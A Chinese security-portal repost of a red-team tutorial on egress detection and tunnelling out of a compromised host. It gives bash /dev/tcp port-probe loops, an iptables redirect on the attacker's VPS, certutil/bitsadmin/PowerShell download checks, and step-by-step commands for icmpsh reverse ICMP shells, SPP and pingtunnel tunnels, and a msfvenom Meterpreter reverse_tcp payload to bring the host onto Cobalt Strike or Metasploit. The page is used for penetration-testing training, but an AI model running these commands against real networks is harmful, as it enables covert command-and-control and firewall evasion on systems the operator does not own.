0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

出网探测是什么

jf_vLt34KHi 来源:Tide安全团队 作者: komorebi 2022-10-20 14:26 次阅读

出网探测

出网探测就是要探测出网协议,出站ip和出站端口。查看是否禁止了出站ip或者禁止了出站端口或者禁止了出站协议。

目标禁止出站ip

如果目标主机设置了严格的策略,防火墙只允许目标内网机器主动连接公网指定的ip。这样的话,没法反弹shell。(因为白名单ip没有办法拿到权限)。

禁止出站端口

Linux系统使用Linux系统自带命令探测出网端口。( 探测目标机器可以访问baidu.com对应ip的端口)

foriin{440..449};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i***********************open************************"||echo"$iclosed";done
8e2b74f4-4f8f-11ed-a3b6-dac502259ad0.png

webshell不好回显结果,将结果写入文件中

foriin{440..449};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i************************open************************"||echo"$iclosed";done>>result.txt
8e4e41b4-4f8f-11ed-a3b6-dac502259ad0.png

探测常见端口

foriin{21,22,23,25,53,80,88,110,137,138,139,123,143,389,443,445,161,1521,3306,3389,6379,7001,7002,8000,8001,8080,8090,9000,9090,11211};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i************************open************************"||echo"$iclosed";done
foriin{21,22,23,25,53,80,88,110,137,138,139,123,143,389,443,445,161,1521,3306,3389,6379,7001,7002,8000,8001,8080,8090,9000,9090,11211};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i************************open************************"||echo"$iclosed";done>>result.txt

攻击端的端口请求记录

从目标发起的端口访问请求,攻击端必须得配合记录,否则即便找到有效的出站端口,我们也无法获悉。思路一,单个逐次监听端口。对于少量端口的探测,攻击端很容易记录。比如,要验证 windows 目标的 8088 端口是否为出站端口,先在攻击端用 nc -n -v -lp 8088 监听 8088,指定 -v 选项观察实时访问记录,再在目标上用 telnet 192.168.56.8 8088 连接攻击端的 8088 端口,最后在攻击端查看端口访问记录,若有则该端口是有效出站端口,若无则重复以上步骤继续验证其他端口。

二,批量捆绑监听端口。试想一下,如果能够把攻击端的多个端口流量转发至单个汇聚端口,就只需监听单个汇聚端口,目标上发起多个端口探测,只要在攻击端转发的多个端口的范围内,那么,一旦找到有效出站端口,攻击端的汇聚端口一定有访问记录。说到端口转发,系统自带的 ssh、iptables,三方的 frp、nps,这些工具都能高效实现,于是,我从这四个工具中找寻具备端口捆绑能力的那位 攻击端这边需要有⽬标机访问的记录,才能更好的判断⽬标机器是否访问了我们。只要⽬标机器访问到 了我们VPS的任意⼀个端⼝,我们这边都能有记录。//将所有端⼝的流量都绑定到34444端⼝

iptables-APREROUTING-tnat-ptcp--dport1:65535-jREDIRECT--to-port34444

//查看nat表的规则

iptables-tnat-nvL

//清除nat表所有规则

iptables-tnat-F

//备份iptables规则

iptables-save>/tmp/firewall.rules

//恢复iptables规则

iptables-restore< /tmp/firewall.rules

配置防⽕墙规则,禁⽌访问远程机器的1-34566和34566-65535端⼝,也就是说只允许访问34567端⼝然后我们这边监听34444端⼝,在⽬标机器端⼝探测

8ea18c5c-4f8f-11ed-a3b6-dac502259ad0.png

禁止出站协议

对于禁止出站协议的情况,需要探测目标机器允许哪些协议出网。

探测ICMP协议服务端

监听ICMP流量:

tcpdumpicmp

客户端ping VPS地址,查看服务端能否收到请求VPS监听,然后ping我们vps查看能否收到监听来判断ICMP 协议是否出⽹。也可以直接ping⼀个地址,看是否 有ttl值。

探测DNS协议

Windows:

nslookup、ping

Linux:

nslookup、dig、ping

通过判断能否将域名解析为ip,判断DNS协议是否出⽹。也可以将域名换成dnslog的域名,再看dnslog能否收到请求。

探测HTTP协议

Linux:可以使用curl命令

curlhttp://192.168.10.13

Windows系统可以使用如下的命令

certutil-urlcache-split-fhttp://www.baidu.com
bitsadmin/transfertesthttp://192.168.10.13/1c:1
powershelliwr-Urihttp://www.baidu.com-OutFile1-UseBasicParsing

只有ICMP协议出网

目标只有icmp协议能出⽹的话,则只有考虑使⽤icmp协议来搭建隧道。利⽤icmp协议通信的⼯具有很多icmpsh、reverse-icmp-shell、PingTunnel、IcmpTunnel都可以。常⻅的ping命令就是利⽤的ICMP协议。

icmpsh(2016+kali2017)

icmpsh 是一个简单的反向 ICMP shell,带有一个 win32 从站和一个 C、Perl 或 Python 中的兼容主站。与其他类似的开源工具相比,它的主要优势在于它不需要管理权限即可在目标机器上运行。使用ICMP进行命令控制(Icmpsh)适⽤场景:⽬标机器是Windows服务器 Linux服务器执行

#关闭icmp回复,如果要开启icmp回复,该值设置为0
sysctl-wnet.ipv4.icmp_echo_ignore_all=1
#运⾏,第⼀个IP是VPS的eth0⽹卡IP(vps上ifconfig可以得到),第⼆个IP是⽬标机器出⼝的公⽹IP
python2icmpsh_m.py192.168.10.8192.168.10.7

目标机器的操作:

icmpsh.exe-t192.168.10.8
8eafaabc-4f8f-11ed-a3b6-dac502259ad0.png

可以看到已经反弹出一个shell

ICMP上线CS

有如下场景,我们拿到了内⽹的机器权限。但是机器对外均只有icmp协议出网,我们现在可以利⽤icmp封装tcp协议,让其上线cs。

使用SPP

平常演练常用的一些隧道工具像frp,nps在目标出网的情况下还是比较好用的。但是一旦遇到一些比较恶劣的环境,比如只有icmp可以出网的情况,那就需要使用其他的工具像pingtunnel,ptunnel等。SPP三个特点:、 支持icmp、kcp、quic 支持双向的代理 可以自由进行内部外协议的组合

功能:支持的协议:tcp、udp、rudp(可靠udp)、ricmp(可靠icmp)、rhttp(可靠http)、kcp、quic 支持的类型:正向代理、反向代理、socks5正向代理、socks5反向代理 协议和类型可以自由组合 外部代理协议和内部转发协议可以自由组合 支持shadowsock/s插件,spp-shadowsock/s-plugin,spp-shadowsock/s-plugin-android cs服务器端

./spp-typeserver-protoricmp-listen0.0.0.0

客户端

spp-name"test"-typeproxy_client-server140.143.167.58-fromaddr:8082-toaddr:8081-proxyprototcp-protoricmp
8ee3edcc-4f8f-11ed-a3b6-dac502259ad0.png

pingtunnel上线MSF&CS

1、pingtunnel下载链接

https://github.com/esrrhs/pingtunnel/releases

注意,在客户端中运行一定要加noprint nolog两个参数,否则会生成大量的日志文件;ICMP为网络层协议,应用层防火墙无法识别,且请求包当中的数据字段被加密 2 vps服务端开启

##开启服务器模式
./pingtunnel-typeserver

3、客户端开启上传客户端

##客户端本地监听9999端口,将监听到的连接通过icmpserver发送到Linsten_ip:7777端口
pingtunnel.exe-typeclient-l127.0.0.1:9999-sicmpserver_ip-t82.157.64.237:7778-tcp1-noprint1-nolog1

4、MSF上线

msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=127.0.0.1LPORT=9999-fexe-oAAA.exe

5、cs上线 建立监听127.0.0.1:9999和192.168.3.76:7777 对127的监听生成木马AAA.exe,传到靶机运行

pingtunnel.exe-typeclient-l127.0.0.1:9999-s192.168.3.76-t192.168.3.76:7777-tcp1-noprint1-nolog1

审核编辑:汤梓红

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • Linux
    +关注

    关注

    87

    文章

    11221

    浏览量

    208882
  • WINDOWS
    +关注

    关注

    3

    文章

    3524

    浏览量

    88399
  • 端口
    +关注

    关注

    4

    文章

    953

    浏览量

    32008

原文标题:隧道与端口转发

文章出处:【微信号:Tide安全团队,微信公众号:Tide安全团队】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    被动声探测数据仿真系统的设计与实现

    被动声探测数据仿真系统的设计与实现摘要以被动声探测数据融合仿真测试评估系统的研究和开发为背景,讨论了被动声探测
    发表于 08-08 09:35

    电缆探测

    时会出现内部断线外部完好,没有仪器情况下是找不到断线位置。我们研制《电缆断线探测器》可探测各种大小型多芯低压电缆, 地埋电缆。检测位置准确,隔皮检测,不损坏电缆。精度10毫米。备有样品,以供观看。如果需要请联系。地址:河南省孟
    发表于 05-06 18:32

    地下金属探测

    本帖最后由 eehome 于 2013-1-5 09:49 编辑 大侠们,谁有这方面的资料可以共享下,想研究一个能探测地下金属的东西电子产品玩玩,我自己本身是做硬件电子开发的,不过不涉及这块,大侠们,有资料记得分享下万分感谢{:soso_e100:}
    发表于 10-24 15:20

    简易照明线路探测

    设计 并制作 具有显示器的 简易 照明线路探测仪 ,能在厚度为 5mm 的五合板 正面探测 背面 2根照明 电缆 的位置, 电缆 的布线 如图 1所示 。电缆一 端与 220V 交流电源插座相连
    发表于 09-04 09:34

    光子探测

    最高分辨率记录弱信号时,无噪声检测器便显示其最大的优势。2、优异的点扩散函数采用混合像素技术和X射线直接转换为电荷脉冲技术,PILATUS探测器的像素之间没有信号传播。这给于单个像素形成尖锐的点扩散函数
    发表于 03-03 19:12

    capture cis 表没有反应

    昨天用capture cis 表时,怎么不出来,总是提示下面的警告,然后就没反应了,检查之后没发现什么异常,最后搜素“.dsnwill be saved prior
    发表于 09-27 17:11

    电流探测线

    示波器一般为输入电压而设计,但可运用电流探测线使示波器能测量电流.电流探测线有一对夹子,使探测线能围绕被测电流流过的电路。当用电流探测线测量电流时,无需有电的连接,也无需切开电路。电流
    发表于 10-30 10:40

    超低空分布式多传感器探测节点有什么优点?

    由于雷达探测存在盲区,低空与超低空飞行的入侵目标给雷达防御系统带来困难与威胁。基于GPS技术、多传感器技术、网络技术及单片机技术设计一种分布式多传感器探测节点,把远程分布的多传感器探测
    发表于 04-14 07:50

    调试网络,是否可以使用以太或UART在外部探测这些网络?

    嗨专家,我想在我的设计中调试一些。是否可以使用以太或UART在外部探测这些网络。如果可能的话,你可以提供一些教程链接或一些可以让我实现它的文档。您的建议和指导将非常有帮助。谢谢
    发表于 05-21 07:35

    被动声探测数据仿真系统的设计与实现

    被动声探测数据仿真系统的设计与实现 以被动声探测数据融合仿真测试评估系统的研究和开发为背景,讨论了被动声探测
    发表于 02-23 09:45 7次下载

    基于方位测量的地下管线探测系统设计与研究

    随着现代信息化技术的发展,在当前的地下管线探测工作中,亟待应用信息化手段设计地下管线探测系统,实现对地下管线探测工作的信息化管理;对此本篇基于方位测量技术,从系统需求分析、系统结构、
    发表于 11-23 15:34 2次下载
    基于方位测量的地下管线<b class='flag-5'>探测</b>系统设计与研究

    天问一号探测器多重

    作为本轮火星探测竞赛第二位场的选手,总重约5吨的“天问一号”作为世界领先探测器之一
    的头像 发表于 07-23 14:50 1.4w次阅读

    各种协议判断主机是否

    允许哪些协议,执行命令时可结合Wireshark工具来查看它走的什么协议。这篇文章的内容基本摘自@Keefe 老哥博客中的 各种协议判断目标是否 。 (1) ICMPping
    的头像 发表于 10-16 14:19 3994次阅读
    各种协议判断主机是否<b class='flag-5'>出</b><b class='flag-5'>网</b>

    如何设计稳定的以太?留意这几个设计要点!

    以太是大部分嵌入式产品必备的通信接口,如何设计稳定、可靠的以太电路呢?本文综合数名行业硬件工程师经验总结以下要点,希望能为读者提供设计思路及解决问题的方法。
    的头像 发表于 04-08 15:47 753次阅读
    如何设计<b class='flag-5'>出</b>稳定的以太<b class='flag-5'>网</b>?留意这几个设计要点!

    科学家研制一款新型柔性X射线探测

    英国科学家开发出一种有机半导体材料,并利用其研制一款新型柔性X射线探测器。这种探测器不仅“身段”更柔软,可贴合需要扫描物体的形状,从而提高患者筛查的准确性,降低肿瘤成像和放射性治疗的风险,而且成本
    的头像 发表于 06-13 06:29 253次阅读